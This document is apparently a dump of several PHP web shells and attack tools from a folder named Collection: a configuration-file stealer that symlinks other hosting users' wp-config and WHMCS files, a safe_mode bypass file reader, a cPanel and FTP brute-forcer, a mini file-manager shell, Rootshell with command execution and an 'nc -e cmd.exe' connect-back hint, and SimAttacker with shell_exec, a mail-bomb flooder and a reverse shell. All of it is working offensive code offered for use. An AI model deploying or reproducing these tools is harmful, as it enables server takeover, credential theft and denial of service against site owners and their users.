 11 | 
102 | '; ?>
121 | 
122 | 	
123 | 		
128 | 
129 | 			
130 | 
131 |        
132 |            --==[[ Configuration  File Killer By Team IndiShell ]]==-- 
 
133 | 
134 |          
137 |          
138 |         #############################################################################################################################################################
-==[[Greetz to]]==--
   Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell
cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk
Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL

139 | 
140 | --==[[Dedicated to]]==--
141 | 
# SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #
--==[[Interface Desgined By]]==--
Deepika Kaushik
 
142 |         #############################################################################################################################################################
143 | 						
144 |            
145 |         
146 | 
147 | '; 
148 | 
149 | ?>
150 | 
Welcome Bhai ji :) .. Configuration file killer welcomes you _/\_ 

151 | 
The button given below generates php.ini file :)

152 | 

153 | 
The button given below extract usernames for symlink :)

154 | 	

155 | 	
156 | 	open this link in new tab to run PHP.INI";
164 | 		echo $link;
165 | 		
166 | 		}
167 | 	
168 | 	
169 | 	
170 | 	?>
171 | 	
172 | 	
173 | 	

176 | 	


184 | 	

185 | 	
186 | 	";
189 | 	if(isset($_POST['su']))
190 | 	{
191 | 	mkdir('Indishell',0777);
192 | $rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
193 | $g = fopen('Indishell/.htaccess','w');
194 | fwrite($g,$rr);
195 | $indishell = symlink("/","Indishell/root");
196 | 		    $rt=" OwN3d";
197 |         echo "Bhai ji .... check link given below for / folder symlink 
$rt";
198 | 		
199 | 		$dir=mkdir('INDISHELL',0777);
200 | 		$r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
201 |         $f = fopen('INDISHELL/.htaccess','w');
202 |    
203 |         fwrite($f,$r);
204 |         $consym="configuration files";
205 |        	echo "
The link given below for configuration file symlink...open it, once processing finish 
$consym";
206 |        	
207 |        		$usr=explode("\n",$_POST['user']);
208 |        	$configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
209 | 		foreach($usr as $uss )
210 | 		{
211 | 			$us=trim($uss);
212 | 						
213 | 			foreach($configuration as $c)
214 | 			{
215 | 			 $rs="/home/".$us."/public_html/".$c;
216 | 			 $r="INDISHELL/".$us.$c;
217 | 			 symlink($rs,$r);
218 | 			
219 | 		}
220 | 			
221 | 			}
222 | 		
223 | 		
224 | 		}
225 | 	
226 | 	
227 | 	
228 | 	?>
229 | 


--------------------------------------------------------------------------------
/Collection/spygrup.php:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 |  	
  4 |  	
  9 |  	
 12 |  	
SpyGrup Safe Mod:ON Fucker 
RFI Olarak Kullanilmaz .PHP Olarak Host'a Yukleyiniz

 13 |  	

 14 |  	

 15 |  	    
Okunacak Dosya:
 16 |  	    
 17 |  	    

 18 |  	

 19 |  	    

 20 |  	        
Sunucu Bilgileri:  

 26 |  	         
 27 |                                
 32 |  	*/
 33 |  	
 34 |  
 35 |  
 36 |  	$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
 37 |  
 38 |  	if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
 39 |  	{
 40 |  	 $safemode = true;
 41 |  	 $hsafemode = "Açik (Güvenli)";
 42 |  	}
 43 |  	else {$safemode = false; $hsafemode = "Kapali (Güvenli Degil)";}
 44 |  	echo("Güvenlik: $hsafemode");
 45 |  	$v = @ini_get("open_basedir");
 46 |  	if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
 47 |  	else {$openbasedir = false; $hopenbasedir = "Kapali (Güvenli Degil)";}
 48 |  	echo("
");
 49 |  	echo("Klasörler Arasi Dolasim: $hopenbasedir");
 50 |  	echo("
");
 51 |  	$version=("Bypass Version 1.1 Beta");
 52 |  	echo "Engelleyici Program : ";
 53 |  	if(''==($df=@ini_get('disable_functions'))){echo "Görünürde Bişiy Yok";}else{echo "$df";}
 54 |  	$free = @diskfreespace($dir);
 55 |  	if (!$free) {$free = 0;}
 56 |  	$all = @disk_total_space($dir);
 57 |  	if (!$all) {$all = 0;}
 58 |  	$used = $all-$free;
 59 |  	$used_percent = @round(100/($all/$free),2);
 60 |  	  error_reporting(E_WARNING);
 61 |  	  ini_set("display_errors", 1);
 62 |  	
 63 |  
 64 |  	  echo "".getcwd()."";
 65 |  
 66 |  	  echo"
";
 67 |  	  echo("
");
 68 |  	        echo "
";
 69 |  	  echo "
ByPass Edilecek Dizin: 
";
 70 |  	  echo "
";
 71 |  
 72 |  
 73 |  	  $root = "./";
 74 |  
 75 |  	  if($_POST['root']) $root = $_POST['root'];
 76 |  	               if($_GET['root']) $root = $_GET['root'];
 77 |  	  if (!ini_get('safe_mode')) die("Safe-mode  OFF.");
 78 |  
 79 |  	  $c = 0; $D = array();
 80 |  	  set_error_handler("eh");
 81 |  
 82 |  	  $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
 83 |  
 84 |  	  for($i=0; $i < strlen($chars); $i++){
 85 |  	  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
 86 |  
 87 |  	  $prevD = $D[count($D)-1];
 88 |        glob($path."*");
 89 |  
 90 |  	        if($D[count($D)-1] != $prevD){
 91 |  
 92 |  	        for($j=0; $j < strlen($chars); $j++){
 93 |  
 94 |  	           $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
 95 |  
 96 |  	           $prevD2 = $D[count($D)-1];
 97 |  	           glob($path."*");
 98 |  
 99 |  	              if($D[count($D)-1] != $prevD2){
100 |  
101 |  
102 |  	                 for($p=0; $p < strlen($chars); $p++){
103 |  
104 |  	                 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
105 |  
106 |  	                 $prevD3 = $D[count($D)-1];
107 |  	                 glob($path."*");
108 |  
109 |  	                    if($D[count($D)-1] != $prevD3){
110 |  
111 |  
112 |  	                       for($r=0; $r < strlen($chars); $r++){
113 |  
114 |  	                       $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
115 |  	                       glob($path."*");
116 |  
117 |  	                       }
118 |  
119 |  	                    }
120 |  
121 |  	                 }
122 |  
123 |  	              }
124 |  
125 |  	        }
126 |  
127 |  	        }
128 |  
129 |  	  }
130 |  
131 |  	  $D = array_unique($D);
132 |  
133 |  	  echo "";
134 |  	  foreach($D as $item) echo "{$item}\n";
135 |  	  echo "";
136 |  
137 |  
138 |  
139 |  
140 |  	  function eh($errno, $errstr, $errfile, $errline){
141 |  
142 |  	     global $D, $c, $i;
143 |  	     preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
144 |  	     if($o){ $D[$c] = $o[2]; $c++;}
145 |  
146 |  	  }
147 |  	echo "
\n";
148 |  	if(empty($file)){
149 |  	if(empty($_GET['file'])){
150 |  	if(empty($_POST['file'])){
151 |  	die("\nHosgeldiniz...Bu Scriptle Sadece c99'da  (Safe Mode=ON) Olan Serverlarda Bypass Yapilabilir Digerlerinde Calismaz  .. Kolay Gelsin\n 

153 |  	kingdefacer@msn.com
");
154 |  	} else {
155 |  	$file=$_POST['file'];
156 |  	}
157 |  	} else {
158 |  	$file=$_GET['file'];
159 |  	}
160 |  	}
161 |  
162 |  	$temp=tempnam($tymczas, "cx");
163 |  
164 |  	if(copy("compress.zlib://".$file, $temp)){
165 |  	$zrodlo = fopen($temp, "r");
166 |  	$tekst = fread($zrodlo, filesize($temp));
167 |  	fclose($zrodlo);
168 |  	 echo"
";
169 |  	echo "--- Start File ".htmlspecialchars($file)."
170 |  	-------------\n".htmlspecialchars($tekst)."\n--- End File
171 |  	".htmlspecialchars($file)." ---------------\n";
172 |  	unlink($temp);
173 |  	die("\nFile
174 |  	".htmlspecialchars($file)." Bu Dosya zaten Goruntuleniyor
175 |  	;]");
176 |  	} else {
177 |  	die("
Uzgunum...
178 |  	".htmlspecialchars($file)." Aradiginiz dosya Bulunamadi
179 |  	access.
");
180 |  	}
181 |  
182 |  	?>


--------------------------------------------------------------------------------
/Collection/cpanel.php:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 | 
  4 | 
  5 | Aria cPanel cracker version 1.0 - Edited By KingDefacer
  6 | 
 15 |   
 22 | 
 36 | 


 38 | 
 bio  -  brute  -  grab users 

";
 39 |  if ( $page == 'bio' ){
 40 | print 
 41 | "


 42 | 
Please enter your USERNAME and PASSWORD to logon

 43 | user

 44 | 220 +ok

 45 | pass ********

 46 | 220 +ok login successful

 47 | [ user@alturks.com ]# info


 48 | Aria cPanel cracker version : 1.0 


 49 | Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version

 50 | Our website ,  http://alturks.com

 51 | 
";
 52 |  }elseif( $page == 'crack'){
 53 |  
 54 | @ini_set('memory_limit', 1000000000000);
 55 | $connect_timeout=5;
 56 | @set_time_limit(0);
 57 | $submit = $_REQUEST['submit'];
 58 | $users = $_REQUEST['users'];
 59 | $pass = $_REQUEST['passwords'];
 60 | $target = $_REQUEST['target'];
 61 | $option = $_REQUEST['option'];
 62 | if($target == ''){
 63 | $target = 'localhost';
 64 | }
 65 | print " 

 66 | 



 67 | 

 68 |  Target  : 

 69 | 


 70 | 
 71 | 
 72 | 
 74 | 
 77 | 
 78 | 

 73 | Username
 75 | 

 76 | Password

 79 | 

 80 | 
 81 | 

 82 | 
                         
 83 | Options :  cPanel 
 84 |  ftp ==> 

 85 | 
";
 86 | ?>
 87 |  Error : Connection timed out , make confidence about validation of target !";
101 | exit;}
102 | 
103 | elseif ( curl_errno($ch) == 0 ){
104 | 
105 | print 
106 | "[ user@alturks.com ]# 
107 |  Attacking has been done , found username ,  $user  and password , 
108 |  $pass 
";}curl_close($ch);}
109 | 
110 | function cpanel_check($host,$user,$pass,$timeout){
111 | $ch = curl_init();
112 | curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
113 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
114 | curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
115 | curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
116 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
117 | curl_setopt($ch, CURLOPT_FAILONERROR, 1);
118 | $data = curl_exec($ch);
119 | if ( curl_errno($ch) == 28 ) { 
120 | print " Error : Connection timed out , make confidence about validation of target !";
121 | exit;}
122 | elseif ( curl_errno($ch) == 0 ){
123 | 
124 | print 
125 | "[ user@alturks.com ]# 
126 | Attacking has been done , found username ,  $user  and password , 
127 |  $pass 
";}curl_close($ch);}
128 | 
129 | if(isset($submit) && !empty($submit)){
130 | 
131 | $userlist = explode ("\n" , $users );
132 | $passlist = explode ("\n" , $pass );
133 | print "[ user@alturks.com ]# Attacking ...
";
134 | foreach ($userlist as $user) {
135 | $_user = trim($user);
136 | foreach ($passlist as $password ) {
137 | $_pass = trim($password);
138 | if($option == "ftp"){
139 | ftp_check($target,$_user,$_pass,$connect_timeout);
140 | }
141 | if ($option == "cpanel")
142 | {
143 | cpanel_check($target,$_user,$_pass,$connect_timeout);
144 | }
145 | }
146 | }
147 | }
148 | }elseif ( $page == 'users'){
149 | echo "

";
150 | echo '
';
151 | $file = $_POST['file'];
152 | $level=0;
153 | if(!file_exists("file:"))
154 |     @mkdir("file:");
155 | @chdir("file:");
156 | $level++;
157 | 
158 | $hardstyle = @explode("/", $file);
159 | 
160 | for($a=0;$a";
172 | if(FALSE==curl_exec($ch))
173 | die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
174 | echo '  ';
175 | curl_close($ch);
176 | print '
';
177 | }
178 | ?>
179 | 


--------------------------------------------------------------------------------
/Collection/mini.php:
--------------------------------------------------------------------------------
  1 | $value){
  7 | $_POST[$key] = stripslashes($value);
  8 | }
  9 | }
 10 | echo '
 11 | 
 12 | 
 13 | 
 14 | Mini Shell
 15 | 
 53 | 
 54 | 
 55 | 

 56 |  Mini Shell 
 57 |  

 58 | 
 59 | ';
 98 | if(isset($_GET['filesrc'])){
 99 | echo "
Direktori : ';
 60 | if(isset($_GET['path'])){
 61 | $path = $_GET['path'];
 62 | }else{
 63 | $path = getcwd();
 64 | }
 65 | 
 66 | $path = str_replace('\\','/',$path);
 67 | $paths = explode('/',$path);
 68 | 
 69 | foreach($paths as $id=>$pat){
 70 | if($pat == '' && $id == 0){
 71 | $a = true;
 72 | echo '/';
 73 | continue;
 74 | }
 75 | if($pat == '') continue;
 76 | echo ''.$pat.'/';
 82 | }
 83 | echo '
';
 84 | if(isset($_FILES['file'])){
 85 | if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
 86 | 
 87 | echo 'File Ter-Upload :* 
';
 88 | }else{
 89 | echo 'Upload gagal, Servernya kek 
 90 |  
';
 91 | }
 92 | }
 93 | echo '

 94 | Upload File : 
 95 | 
 96 | 

 97 | 
Current File : ";
100 | echo $_GET['filesrc'];
101 | echo '

';
102 | echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
');
103 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
104 | echo '
'.$_POST['path'].'

';
105 | if($_POST['opt'] == 'chmod'){
106 | if(isset($_POST['perm'])){
107 | if(chmod($_POST['path'],$_POST['perm'])){
108 | echo 'Change Permission Done.
';
109 | }else{
110 | echo 'Change Permission Error.
';
111 | }
112 | }
113 | echo '

114 | Permission : 
115 | 
116 | 
117 | 
118 | 
';
119 | }elseif($_POST['opt'] == 'rename'){
120 | if(isset($_POST['newname'])){
121 | if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
122 | echo 'Change Name Done.
';
123 | }else{
124 | echo 'Change Name Error.
';
125 | }
126 | $_POST['name'] = $_POST['newname'];
127 | }
128 | echo '

129 | New Name : 
130 | 
131 | 
132 | 
133 | 
';
134 | }elseif($_POST['opt'] == 'edit'){
135 | if(isset($_POST['src'])){
136 | $fp = fopen($_POST['path'],'w');
137 | if(fwrite($fp,$_POST['src'])){
138 | echo 'Edit File Done ~_^.
';
139 | }else{
140 | echo 'Edit File Error ~_~.
';
141 | }
142 | fclose($fp);
143 | }
144 | echo '

145 | 

146 | 
147 | 
148 | 
149 | 
';
150 | }
151 | echo '
';
152 | }else{
153 | echo '
';
154 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
155 | if($_POST['type'] == 'dir'){
156 | if(rmdir($_POST['path'])){
157 | echo 'Delete Dir Done.
';
158 | }else{
159 | echo 'Delete Dir Error.
';
160 | }
161 | }elseif($_POST['type'] == 'file'){
162 | if(unlink($_POST['path'])){
163 | echo 'Delete File Done.
';
164 | }else{
165 | echo 'Delete File Error.
';
166 | }
167 | }
168 | }
169 | echo '
';
170 | $scandir = scandir($path);
171 | echo '

172 | 
173 | 
174 | 
175 | 
176 | 
177 | ';
178 | 
179 | foreach($scandir as $dir){
180 | if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
181 | echo "
182 | 
183 | 
184 | 
191 | 
203 | ";
204 | }
205 | echo '';
206 | foreach($scandir as $file){
207 | if(!is_file("$path/$file")) continue;
208 | $size = filesize("$path/$file")/1024;
209 | $size = round($size,3);
210 | if($size >= 1024){
211 | $size = round($size/1024,2).' MB';
212 | }else{
213 | $size = $size.' KB';
214 | 
215 | }
216 | 
217 | echo "
218 | 
219 | 
220 | 
226 | 
239 | ";
240 | }
241 | echo '
Name
Size
Permissions
Options
$dir
--
";
185 | if(is_writable("$path/$dir")) echo '';
186 | elseif(!is_readable("$path/$dir")) echo '';
187 | echo perms("$path/$dir");
188 | if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '';
189 | 
190 | echo "

192 | 
198 | 
199 | 
200 | 
201 | \" />
202 | 
$file
".$size."
";
221 | if(is_writable("$path/$file")) echo '';
222 | elseif(!is_readable("$path/$file")) echo '';
223 | echo perms("$path/$file");
224 | if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '';
225 | echo "

227 | 
234 | 
235 | 
236 | 
237 | \" />
238 | 

242 | 
';
243 | }
244 | echo '

Zerion Mini Shell 1.0

245 | 
246 | ';
247 | function perms($file){
248 | $perms = fileperms($file);
249 | 
250 | if (($perms & 0xC000) == 0xC000) {
251 | 
252 | // Socket
253 | $info = 's';
254 | } elseif (($perms & 0xA000) == 0xA000) {
255 | // Symbolic Link
256 | $info = 'l';
257 | } elseif (($perms & 0x8000) == 0x8000) {
258 | // Regular
259 | $info = '-';
260 | } elseif (($perms & 0x6000) == 0x6000) {
261 | // Block special
262 | $info = 'b';
263 | } elseif (($perms & 0x4000) == 0x4000) {
264 | // Directory
265 | $info = 'd';
266 | } elseif (($perms & 0x2000) == 0x2000) {
267 | // Character special
268 | $info = 'c';
269 | } elseif (($perms & 0x1000) == 0x1000) {
270 | // FIFO pipe
271 | $info = 'p';
272 | } else {
273 | // Unknown
274 | $info = 'u';
275 | }
276 | 
277 | // Owner
278 | $info .= (($perms & 0x0100) ? 'r' : '-');
279 | $info .= (($perms & 0x0080) ? 'w' : '-');
280 | $info .= (($perms & 0x0040) ?
281 | (($perms & 0x0800) ? 's' : 'x' ) :
282 | (($perms & 0x0800) ? 'S' : '-'));
283 | 
284 | 
285 | // Group
286 | $info .= (($perms & 0x0020) ? 'r' : '-');
287 | $info .= (($perms & 0x0010) ? 'w' : '-');
288 | $info .= (($perms & 0x0008) ?
289 | (($perms & 0x0400) ? 's' : 'x' ) :
290 | (($perms & 0x0400) ? 'S' : '-'));
291 | 
292 | // World
293 | $info .= (($perms & 0x0004) ? 'r' : '-');
294 | $info .= (($perms & 0x0002) ? 'w' : '-');
295 | 
296 | $info .= (($perms & 0x0001) ?
297 | (($perms & 0x0200) ? 't' : 'x' ) :
298 | (($perms & 0x0200) ? 'T' : '-'));
299 | 
300 | return $info;
301 | }
302 | ?>
303 | 


--------------------------------------------------------------------------------
/Collection/Rootshell.v.1.0.php:
--------------------------------------------------------------------------------
  1 | 
 61 | 
 72 | 
 73 | 
 74 | 
 79 | 

 80 | 
 ____             _         ____  _          _ _
 81 | |  _ \ ___   ___ | |_      / ___|| |__   ___| | |
 82 | | |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
 83 | |  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
 84 | |_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|

 85 | 

 86 | 

 87 | 

 88 | 
 89 | 

 90 |   

 91 |   

 92 |   Safe Mode ON';
 96 | } else {
 97 |    print 'Safe Mode OFF';
 98 | }
 99 | 
100 | ?>
101 |  
!

102 |  
103 |     
104 |       
106 |     
107 |     
108 |       
118 |   

105 |       
[ Server Info ]

109 |       

110 |         Current Directory: 
111 |         

112 |         Shell: 
113 |         

114 |         Server Software: 

115 |         Server Name: 

116 |         Server Protocol: 

117 |         


119 |     
120 |     
121 |       
123 |       
125 |     
126 |     
127 |       
194 | 
195 |       
196 |     
197 |       
199 |       
201 |     
202 |     
203 |       
219 |       
232 |     
233 |   

122 |       
[ Command Execute ]

124 |       
[ File Upload ]

128 |       

129 | 

130 | 

131 | Insert your commands here:

132 | 

133 |  

134 | 


135 |  

136 |       

137 |       

138 |         

139 |         

140 |         Info: For a connect 
141 |         back Shell, use: nc -e cmd.exe [SERVER] 3333

142 |         after local command: nc -v -l -p 3333 (Windows)

 


143 | 

144 | 


145 | 

146 | Here you can upload some files.

147 | 

148 | 

149 | 

150 |  

151 |  

152 |  

153 | 

154 | File already exist
";
175 |     }
176 | 
177 |     else
178 |     {
179 |         copy($file,"$filename");
180 |         if( file_exists($filename))
181 |         {
182 |             echo "
File uploaded successful
";
183 |         }
184 |         elseif(! file_exists($filename))
185 |         {
186 |             echo "
File not found
";
187 |         }
188 |     }
189 | }
190 | ?> 
191 | 
192 | 

193 | 

198 |       
[ Files & Directories ]

200 |       
[ File Inclusion ]

204 |       

205 | 

206 | 
207 | '.$file.'
';
212 | }
213 | closedir($folder);
214 | ?>

215 |       
216 |       

217 |       

218 |          
 

220 |       


221 |       Include 
222 |       something :)

223 |       

224 |  

225 |        

226 |         

227 |         

228 |         

229 |       

230 |       
231 |       

234 |   

235 | 

236 | 

237 | 

238 |   

239 |   
240 |     
241 |       
243 |     
244 |   

242 |       
Rootshell v  2006 by SR-Crew 

245 |   

246 | 
 


--------------------------------------------------------------------------------
/Collection/SimAttacker.php:
--------------------------------------------------------------------------------
  1 |  "" ){
  5 | // path & file name
  6 | $path_parts = pathinfo("$fdownload");
  7 | $entrypath=$path_parts["basename"];
  8 | $name = "$fdownload";
  9 | $fp = fopen($name, 'rb');
 10 | header("Content-Disposition: attachment; filename=$entrypath");
 11 | header("Content-Length: " . filesize($name));
 12 | fpassthru($fp);
 13 | exit;
 14 | }
 15 | ?>
 16 | 	
 17 | 
 18 | 
 19 | 
 20 | 
 21 | 
 22 | SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend 
 23 | 
 28 | 
 29 | 
 30 |  "" ){
 36 |  $fedit=realpath($fedit);
 37 |  $lines = file($fedit);
 38 |  echo "
";
 39 | echo "
 44 | 	
 45 | 	
";
 46 | 	$savefile=$_POST['savefile'];
 47 | 	$filepath=realpath($_POST['filepath']);
 48 | 	if ($savefile <> "") 
 49 | 	{
 50 | 	$fp=fopen("$filepath","w+");
 51 | 	fwrite ($fp,"") ;
 52 | 	fwrite ($fp,$savefile) ;
 53 | 	fclose($fp);
 54 | 	echo "";
 55 | 	}
 56 | exit();
 57 |  }
 58 | ?>
 59 |  "" ){
 63 | $fchmod=realpath($fchmod);
 64 | echo "


 65 | chmod for :$fchmod

 66 | 


 67 | Chmod :

 68 | 

 69 | 
 70 | 
";
 71 | $chmod0=$_POST['chmod0'];
 72 | if ($chmod0 <> ""){
 73 | chmod ($fchmod , $chmod0);
 74 | }else {
 75 | echo "primission Not Allow change Chmod";
 76 | }
 77 | exit();
 78 | }
 79 | ?>
 80 | 	
 81 | 

 82 | 	
 83 | 		
 84 | 			
112 | 			
363 | 		
364 | 		
365 | 			
372 | 		
373 | 	

 85 | 				

 86 | 				

 87 | 				
 88 | 				
 89 | 				
 90 | 				
 91 | 				
 95 | 				File Manager

 96 | 				

 97 | 				
 98 | 				
 99 | 				CMD Shell

100 | 				

101 | 				
102 | 				Fake mail

103 | 				

104 | 				
105 | 				
106 | 				Connect Back

107 | 				

108 | 				
109 | 				
110 | 				About

111 | 				
 
 

113 | 			
121 | ***************************************************************************

122 |  Iranian Hackers : WWW.SIMORGH-EV.COM 

123 |  Programer : Hossein Asgary 

124 |  Note : SimAttacker  Have copyright from simorgh security Group  

125 |  please : If you find bug or problems in program , tell me by : 

126 |  e-mail : admin(at)simorgh-ev(dot)com

127 | Enjoy :) [Only 4 Best Friends ] 

128 | ***************************************************************************

129 | ";
130 | 
131 | echo "OS :". php_uname();
132 | echo "
IP :". 
133 | ($_SERVER['REMOTE_ADDR']);
134 | echo "";
135 | 
136 | 
137 | 			}
138 | 			//************************************************************
139 | 			//cmd-command line
140 | 			$cmd=$_POST['cmd'];
141 | 			if($id=="cmd"){
142 | 		$result=shell_exec("$cmd");
143 | 		echo "
 CMD ExeCute 
" ;
144 | 		echo "

145 | 		

146 | 		

147 | 		
148 | 		
149 | 		
";
150 | 			
151 | 			
152 | 			
153 | 			}
154 | 			
155 | 		//********************************************************	
156 | 		
157 | 		//fake mail = Use victim server 4 DOS - fake mail 
158 | 		if ( $id=="fake-mail"){
159 | 		error_reporting(0);
160 | 		echo "
 Fake Mail- DOS E-mail By Victim Server 
" ;
161 | 		echo "

162 | 		Victim Mail :


163 | 		Number-Mail :


164 | 		Comments:
165 | 		

166 | 		

167 | 		
168 | 		
";
169 | 		//send Storm Mail
170 | 		$to=$_POST['to'];
171 | 		$nom=$_POST['nom'];
172 | 		$Comments=$_POST['Comments'];
173 | 		if ($to <> "" ){
174 | 		for ($i = 0; $i < $nom ; $i++){
175 | 		$from = rand (71,1020000000)."@"."Attacker.com";
176 | 		$subject= md5("$from");
177 |         mail($to,$subject,$Comments,"From:$from");
178 |         echo "$i is ok";
179 |         }      
180 |         echo "";
181 |         }
182 | 		}
183 | 		//********************************************************
184 | 
185 | 			//Connect Back -Firewall Bypass
186 | 			if ($id=="cshell"){
187 | 			echo "
Connect back Shell , bypass Firewalls

188 | 			For user :

189 | 			nc -l -p 1019 

190 | 			

191 | 			


192 | 			Your IP & BindPort:

193 | 			
194 | 			

195 | 			
196 | 			
";
197 | 		 $mip=$_POST['mip'];
198 | 		 $bport=$_POST['bport'];
199 | 		 if ($mip <> "")
200 | 		 {
201 | 		 $fp=fsockopen($mip , $bport , $errno, $errstr);
202 | 		 if (!$fp){
203 | 		       $result = "Error: could not open socket connection";
204 | 		 }
205 | 		 else {
206 | 		 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
207 | 	  while(!feof($fp)){ 
208 |        fputs ($fp," bash # ");
209 |        $result= fgets ($fp, 4096);
210 |       $message=`$result`;
211 |        fputs ($fp,"--> ".$message."\n");
212 |       }
213 |       fclose ($fp);
214 | 		 }
215 | 		 }
216 | 			}
217 | 			
218 | 		//********************************************************
219 | 			//Spy File Manager
220 | 			$homedir=getcwd();
221 | 			$dir=realpath($_GET['dir'])."/";
222 | 			if ($id=="fm"){
223 | 			echo "
 Home: $homedir 
224 |                    
225 |                   

226 |                    Path:
227 |                   
228 |                   
229 |                   
230 |                   

231 |                  
";
232 | 
233 | 			echo "
234 | 
235 | 

236 | 
237 | 
238 | 	
239 | 		
240 | 		
242 | 		
244 | 		
246 | 		
248 | 		
249 | 	";
250 | 		    if (is_dir($dir)){
251 | 		    if ($dh=opendir($dir)){
252 | 		    while (($file = readdir($dh)) !== false) {
253 | 		    $fsize=round(filesize($dir . $file)/1024);
254 | 		
255 | 		    
256 | 	echo " 
257 | 	
258 | 		
267 | 		
277 | 		
289 | 		
302 | 		
310 | 		
311 | 	
312 | 	";
313 | 		      }
314 | 		      closedir($dh);
315 | 		    } 
316 | 		    }
317 | 		    echo "
File / Folder Name
241 | 		Size KByte
243 | 		Download
245 | 		Edit
247 | 		ChmodDelete
";
259 | 		if (is_dir($dir.$file))
260 | 		{
261 | 		echo " $file dir";
262 | 		}
263 | 		else {
264 | 		echo " $file ";
265 | 		}
266 | 		echo "";
268 | 		if (is_file($dir.$file))
269 | 		{
270 | 		echo "$fsize";
271 | 		}
272 | 		else {
273 | 		echo "  ";
274 | 		}
275 | 		echo "
276 | 		";
278 | 		if (is_file($dir.$file)){
279 | 		if (is_readable($dir.$file)){
280 | 		echo "download";
281 | 		}else {
282 | 		echo "No ReadAble";
283 | 		 }
284 | 		}else {
285 | 		echo " ";
286 | 		 }
287 | 		echo "
288 | 		";
290 | 		if (is_file($dir.$file))
291 | 		{
292 | 		if (is_readable($dir.$file)){
293 | 		echo "Edit";
294 | 		}else {
295 | 		echo "No ReadAble";
296 | 		 }
297 | 		}else {
298 | 		echo " ";
299 | 		 }
300 | 		echo "
301 | 		";
303 | 		if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
304 | 		echo "Dont in windows";
305 | 		}
306 | 		else {
307 | 		echo "Chmod";
308 | 		}
309 | 		echo "Delete

318 | 

319 |  
320 |  Send this file: 
321 |  
322 |  
323 |  
324 | 		    
";
325 | 			}
326 | //Upload Files 
327 | $rpath=$_GET['dir'];
328 | if ($rpath <> "") {
329 | $uploadfile = $rpath."/" . $_FILES['userfile']['name'];
330 | print "
";
331 | if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
332 | echo "";
333 | echo "";
334 | }
335 |  }
336 |  //file deleted
337 | $frpath=$_GET['fdelete'];
338 | if ($frpath <> "") {
339 | if (is_dir($frpath)){
340 | $matches = glob($frpath . '/*.*');
341 | if ( is_array ( $matches ) ) {
342 |   foreach ( $matches as $filename) {
343 |   unlink ($filename);
344 |   rmdir("$frpath");
345 | echo "";
346 | echo "";
347 |   }
348 |   }
349 |   }
350 |   else{
351 | echo "";
352 | unlink ("$frpath");
353 | echo "";
354 | exit(0);
355 | 
356 |   }
357 |   
358 | 
359 | }
360 | 			?>
361 | 			
362 | 			

366 | 			


